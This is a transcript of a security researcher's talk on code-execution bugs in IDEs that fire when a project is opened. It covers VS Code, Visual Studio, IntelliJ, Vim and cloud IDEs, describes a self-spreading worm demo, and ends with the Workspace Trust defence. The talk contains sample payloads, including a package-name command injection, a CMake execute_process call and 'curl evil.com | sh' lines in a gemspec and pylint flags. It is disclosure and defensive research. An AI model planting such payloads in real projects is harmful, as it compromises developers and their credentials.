Hi everyone, I'm David, and today we're going to talk about hacking IDEs. First, a little bit about myself. I'm a security engineer at Google, where I work on web security. I'm focused both on developing new web security features and on figuring out how to deploy them at scale. Outside of work, I really enjoy hacking in both senses of the word: I enjoy programming and working on silly projects just for the joy of creating something, just as much as I enjoy finding vulnerabilities, taking things apart, and working on bug bounties. During the pandemic, I had a couple of months free when I was originally supposed to be taking time off to go traveling, and I spent those months looking into IDE security. I found and reported 30 or 40 different bugs across a bunch of different IDEs. So today, I want to go on a whirlwind tour of these bugs. One thing to note: all of the bugs in this presentation have either been fixed or declared working as intended. So why hack developers? Your standard production infrastructure is likely to be heavily hardened. Everyone thinks about attacking production, and because of that, it's where defenders put a lot of time and effort. Developers, on the other hand, are a less common target, so chances are they're not as hardened as production. But because they're the creators of production, maintaining it and pushing new code to it, developers often have the ability to access production. So if you can hack them, you can then use their credentials to pivot into production. IDEs specifically are a really interesting target, in my opinion, because they've been getting more and more complex over time. An IDE is no longer just a text editor. It now includes so many different fancy tools: autocomplete, AI-assisted completion, integrations with any tool you can imagine. And whenever you have all those integrations, you're more likely to have bugs.
If you ask your average developer, or even your average security person, where the security boundary is when they open up something they don't trust, they're likely to point to the Run button. In this case, I personally would have thought that if I don't hit Run, it's totally safe to open up a random folder and look at some of the code inside of it. But it turns out that for most IDEs, at least historically, the real security boundary is just opening something to view it. And what makes all of this especially impactful is the fact that IDEs are extremely popular. Over half of all developers use VS Code, one popular IDE that's built using a kind of web stack: HTML and JavaScript. So if you have a bug just in VS Code, you already have the ability to target half of all developers. And then there are a couple of others; once you find a way to attack those too, the number of developers you can attack just continues to go up. When the pandemic hit, I ended up with a lot of free time because I had plans to go traveling and that wasn't happening. So I started to look into VS Code, just because it's one that I personally use a lot. One really common vulnerability pattern in VS Code stems from workspace settings. VS Code allows two different ways to configure settings. You have your standard user settings, which apply to everything on your computer. But there are also workspace settings, and workspace settings are specific to a directory that you open. The really interesting thing about workspace settings is that the settings file is actually stored inside a magic .vscode/settings.json file inside the project. So if you download some Git repo off the internet and open it up in VS Code, it can supply its own workspace settings. This is a really useful feature because it allows projects to configure themselves in a way that makes them easy to work with.
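As a sketch, a checked-in workspace settings file looks something like this; the keys here are just common, benign examples of the kinds of options a repo can set for everyone who opens it:

```json
{
    "editor.tabSize": 2,
    "files.trimTrailingWhitespace": true
}
```

The file lives at .vscode/settings.json in the repo root, so it travels with the project to anyone who clones it.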
Where this goes wrong is that VS Code and a lot of VS Code extensions have settings that are actually not safe to be configured by an untrusted party. This isn't just changing the font size or other benign settings; there are settings that can turn into code execution. For example, the Python VS Code extension made it possible to override the path to the flake8 binary. flake8 is a common Python linter, so it's meant to tell you things like your lines are too long. But by overriding the flake8 path to point at a binary included inside a project, it was possible to convince the Python VS Code extension to start executing code included in the project as soon as you view a file, because the linter runs as soon as you view a file. This is scary because it means viewing a file just to try to understand a project, for example opening up a POC you downloaded off the internet, isn't actually safe in the face of this. One really useful tool I used throughout all of this research was strace. strace is this amazing tool that allows you to run a command and log all of the syscalls that it makes. Syscalls are how programs interact with the operating system, and thus with any other resource on the computer. Every time they want to start a new process, spawn a thread, open a file, anything like that, it has to go through a syscall. So, for example, if we wanted to run VS Code via strace, we would just run it under strace and then be able to look at all of the syscalls it makes. What's so powerful about this is that it allows you to understand the actual behavior of a program without having to read all of the source code. IDEs are huge, and it just isn't practical to read every line of the source, but it is practical to review the syscalls and use them to understand how it works. For example, you can cat the log file and grep for ENOENT. ENOENT is the error code you get back if you try to open a file that doesn't exist.
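The log-mining workflow just described can be sketched as follows. In practice you'd generate the log with something like `strace -f -o trace.log code .`; since that isn't reproducible here, the three log lines below are fabricated examples of what such a trace looks like, so the grep step is self-contained:

```shell
# Fake a tiny strace log (real ones come from: strace -f -o trace.log <cmd>)
cat > trace.log <<'EOF'
openat(AT_FDCWD, "/home/dev/proj/.vscode/settings.json", O_RDONLY) = 3
openat(AT_FDCWD, "/home/dev/proj/node_modules/jshint", O_RDONLY) = -1 ENOENT (No such file or directory)
execve("/usr/bin/npm", ["npm", "view", "lodash"], ...) = 0
EOF

grep ENOENT trace.log     # files the program looked for but didn't find
grep '^execve' trace.log  # every command the program executed
```

Each ENOENT hit is a file the IDE wanted but didn't get, which is exactly where a malicious project might be able to supply one.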
So this allows you to know that VS Code tried to open a file that didn't exist, and thus there might be some kind of special behavior there. For example, it might be looking for a config file, and you might be able to poison that config file. You can also just grep for the open syscall; that finds every file it opens, whether it exists or not. Another really useful one is grepping for the exec syscall, which is how one process launches another command. That makes it possible to look for your standard command-injection-style attacks. One bug I found with this was a common one in a lot of JavaScript-based extensions (most VS Code extensions are developed in JavaScript). The default behavior is that an extension will attempt to load the node_modules folder in order to find its dependencies. Where this goes wrong is that it will first attempt to load the node_modules folder from the currently open project. In this case, this was the JSHint extension, which is another linter, so it runs as soon as you open a file, and we can see that it attempted to open the node_modules/jshint file within the currently open directory. What this means is we could just put our own malicious JavaScript in there, and it will helpfully go and execute it as soon as you open a file, when it tries to provide linting support. Another one, also found via strace, was a command injection bug involving npm, a common JavaScript package manager. In package.json files, which are how npm is configured, VS Code attempts to be helpful and wants to show you information on the dependencies you have installed. So it takes every dependency you have listed and passes it into npm view. The key thing to note here is that it does not escape the package name. So if you just have a package named with a semicolon, a space, and then any command, it will just start executing that command.
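The unescaped-name injection can be illustrated with a hypothetical package.json; the dependency "name" itself is the payload, and the touch command is just a harmless placeholder for whatever an attacker would actually run:

```json
{
    "name": "innocent-project",
    "dependencies": {
        "; touch /tmp/pwned": "1.0.0"
    }
}
```

This is a sketch of the bug class, not the exact payload from the report: anything appended to the package name after the shell metacharacter ends up in the command line that invokes npm view.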
And this was found just by running it with strace and looking for any time it runs exec. Moving on from Visual Studio Code to Visual Studio, which is a different IDE also made by Microsoft. One bug I found in this was with build configs. Visual Studio supports CMake; CMake is kind of like make, if you've ever used that. And Visual Studio will by default run CMake in order to provide autocomplete for anything you open. Where this goes wrong is that CMake provides the ability to execute a command. In this case, you can just call execute_process on evil.bat, and that will run as soon as anything is opened inside Visual Studio. I reported this to Microsoft, and in contrast to all of the VS Code bugs, which were treated very seriously and promptly patched, their decision here was that this is by design and there is no way to view scripts in Visual Studio without also executing them. So this is fair warning that VS Code at least attempts to be safe when opening untrusted projects, but Visual Studio does not. Something really interesting happened a couple of months later. Google's Threat Analysis Group published a blog post, which I was not involved with, about a North Korean threat actor that was targeting security researchers. What they were doing was reaching out to security researchers and asking for help debugging their zero-days. If the researcher agreed, they would send them a zip file containing a Visual Studio project to open up. And inside of this Visual Studio project, they used a very similar trick to get code execution as soon as it was opened, and then used that to pwn the researcher. What this shows, in my opinion, is that this attack vector is not just a theoretical concern. This is something that actual APTs out in the real world are using, and they're using it to attack security researchers, who are already relatively paranoid.
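As a sketch, a CMakeLists.txt along these lines is all it takes; execute_process runs at configure time, i.e. as soon as the IDE parses the project, and evil.bat is a stand-in name for the attacker's script:

```cmake
cmake_minimum_required(VERSION 3.10)
project(innocent)

# execute_process runs when CMake *configures* the project, not when it
# builds, so simply indexing the project for autocomplete triggers it.
execute_process(COMMAND evil.bat)
```

No build, and no Run button, is ever involved.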
So if you are ever given a zip file and told to open it by someone saying, hey, I need some help, definitely be suspicious of that. One historical bug that I just want to cover, because I think it's so fascinating, is a bug in IntelliJ from 2016, where this person found that IntelliJ had a locally listening web server, and any website you opened could talk to that web server via CORS and ask it to open a project. IntelliJ would then open that project, even one downloaded off the internet, and would then execute a startup task contained within it. For example, this was their POC, where visiting a localhost URL was able to pop Calculator with zero interaction. What's interesting is that when IntelliJ fixed this, they fixed it by preventing localhost, or any untrusted website, from interacting with IntelliJ. They didn't fix the underlying vector, where opening a project is equivalent to code execution. So I reached back out to them to discuss this, using pretty much exactly the same vector: you have a startup task, and it can just execute any command. This is a built-in feature of IntelliJ. Their initial reply was that they hadn't decided what the fix should be, because they needed to make a trade-off between security and convenience. This was a really common pattern when talking to IDE developers, because IDEs try to make developers' lives easier. They want to make it as efficient as possible to build software, and if you have to constantly warn someone about this risk and that risk and the other risk, that's going to annoy developers. Ultimately, IntelliJ did decide to fix this, and their fix is that whenever you open a project for the first time, if it contains a startup task, it warns you. And if you think that these bugs only apply to large, heavyweight IDEs like IntelliJ, you're sadly mistaken.
This was a fascinating bug from 2019. Vim has a concept of modelines, which are kind of analogous to VS Code and its workspace settings. And via modelines, it turns out it was possible to get code execution just from opening a file, again with zero user interaction other than viewing the file. Tavis even found a great bug in Notepad, where it was possible to take opening a file in Notepad, kind of the dumbest and most basic of editors, and turn that into code execution. Where this gets even more interesting, in my opinion, is online IDEs. There's a big shift nowadays where companies are trying to have developers use online IDEs that run in the cloud. The idea is that rather than running everything locally with limited resources on a laptop, and having to worry about internet speed, processor speed, and provisioning enough resources, developers can essentially be given a virtual machine in the cloud that their IDE runs inside of. Google Cloud Shell, Azure, AWS, GitHub: all of these companies have their own solution for this. What makes these really interesting, in my opinion, is that they all include built-in cloud credentials, whether that's Google Cloud, Cloud9, or Azure. What this means is that if you manage to get code execution inside one of these VMs, it is already authenticated to access anything in the cloud that the developer has access to. That makes these a really impactful target from a security perspective. I found a really fun bug inside Google Cloud Shell. Google Cloud Shell is built on top of Eclipse Theia, an open source web IDE. Eclipse Theia has support for Ruby via the Theia Ruby extension, and the Theia Ruby extension is in turn built on top of Solargraph, which is an open source project maintained by a single person.
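For context on the modeline mechanism mentioned above: a modeline is a specially formatted comment near the top or bottom of a file that sets editor options when Vim opens it. A benign example looks something like this (the 2019 bug chained option values that evaluate expressions into an escape from the modeline sandbox):

```vim
/* vim: set ts=8 sw=8 noexpandtab: */
```

So, just like workspace settings, a file you merely open gets to reconfigure your editor.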
What's kind of interesting about this is that Google Cloud Shell, which has very strict security requirements, is, three levels down, depending on an open source project that they really don't have very much influence over. When I started reading the Solargraph code, I found this comment: "hack: evaluating gemspec files violates the goal of not running workspace code, but this is how Gem::Specification.load does it anyway". And then you see it reads a file and evaluates it. What this means is that if someone opens something inside their online Cloud Shell IDE and it contains a gemspec file, it immediately evaluates that Ruby code. And that Ruby code can then start stealing the cloud credentials and acting as that user. There was a similar bug in the TypeScript language server, where TypeScript made it possible to specify additional compiler plugins that provide support for different language features. This in theory should be safe, because all of these plugins are loaded from /var/ and somewhere in there. But the classic ../ trick actually just worked totally fine here. What both of these vulnerabilities have in common is that they both stem from a very, very sensitive application, in this case Google Cloud Shell, using dependencies that have a very different threat model. For Google Cloud Shell, it's important that opening something does not turn into code execution. But for these other dependencies, oftentimes made by a single person somewhere, this isn't actually an important barrier. AWS Cloud9 also had a very similar bug, where, similar to VS Code, it allows a project to include its own settings. And one of the settings that it allows a project to configure is a bunch of pylint flags. pylint is another linter. This is a very common vector, because linters always execute as soon as you view a file. And inside of these included workspace settings, you could provide pylint flags.
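As a sketch, the gemspec vector described above looks something like this: a file that is nominally package metadata but is really arbitrary Ruby, evaluated the moment the language server loads it (the payload command and names here are placeholders):

```ruby
# innocent.gemspec -- Gem::Specification.load reads and eval's this file,
# so anything in it runs as soon as the IDE indexes the project.
system("curl https://evil.example/x | sh")  # placeholder payload

Gem::Specification.new do |s|
  s.name    = "innocent"
  s.version = "0.0.1"
  s.summary = "Looks like ordinary package metadata"
end
```

In a Cloud Shell VM, that payload runs with the developer's cloud credentials already attached.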
And the interesting thing is that pylint supports a kind of bizarre feature where you can pass it an arbitrary expression to evaluate, and it will use that expression to score how well your code adheres to a coding style. In this case, you could just pass it curl evil.com | sh, and that worked just fine. GitHub Codespaces is another one of these online IDEs. From a security perspective, GitHub Codespaces has a really clever design, in my opinion: rather than trying to prevent code execution from happening, it runs every project in an isolated VM. The idea is that one VM, containing one codespace for one repository, can't interact or interfere with any other VM. Where this goes wrong is that GitHub Codespaces had a concept of Settings Sync. Settings Sync made it possible to configure settings in one codespace and have them get sent to every other codespace. This was a feature meant to be used for things like changing font size. But where this went wrong is that if you opened an untrusted repository in GitHub Codespaces, that untrusted repository could easily get code execution inside its isolated VM, and then it could configure settings for that entire codespace, and those settings would then be synced everywhere else. It turns out it was really easy to use those settings to sync command execution across VMs. The part that is absolutely terrifying to me about all of this is what happens if someone writes a worm. The idea is you start with one developer, one person who has somehow been compromised, and they push a bunch of malicious IDE configs to one repository: an exploit for every vulnerability we've talked about, and more. And then people are going to start viewing that one repository.
And assuming they're using any common IDE, which as we established before they probably are, that worm can automatically propagate itself to every repository they have control over. And then other people are likely going to view those repositories, and this can keep on propagating exponentially. It really has a lot of terrifying potential to spread far. So I made a quick demo of this; let's run through it. Here we have an empty repository. It has nothing in it other than a readme file. And then inside of the evil repo, we have a bunch of different IDE config files. These will all execute worm.py whenever they're opened in the applicable IDE. So if you open this in VS Code or IntelliJ or any popular IDE, it'll automatically execute the worm. The worm will then look for any Git repositories on your computer, automatically backdoor them, and then run git push so as to continue spreading. So we're going to go ahead and git clone this and then open it up in VS Code. And here in VS Code, there's no hint of anything suspicious at all. Everything looks totally normal: no error messages, nothing of that sort. But if we go over here to what was an empty repository and wait a few seconds before we refresh, it has now been backdoored, contains all of these config files, and will continue spreading if anyone else opens it up. As I mentioned before, the core defense against this class of bugs is that developers need to be prompted, and need to be given a choice, before code starts executing. VS Code just came out with a new feature that helps defend against this class of bugs, called Workspace Trust. What this does is, when you open something for the first time, you're asked whether or not you trust it, and that defines whether it runs in trusted mode or restricted mode. If it's in restricted mode, by default it does not use any of the settings defined inside that folder.
It also does not allow any extensions to run. This makes it a really minimal IDE when it's being used with untrusted code, but you still have the power of a full IDE once you trust a folder. I just want to say thank you to everyone I worked with on finding these bugs and getting them addressed; there were tons of different companies involved in fixing these, so thank you to everyone for that. I uploaded the POC from the demo to GitHub, and you can also get these slides there. And a big shout-out to the researcher who originally got me interested in this area of research when they published four different bugs in Google Cloud Shell; I definitely recommend checking out that blog post. Thank you, everyone. Bye.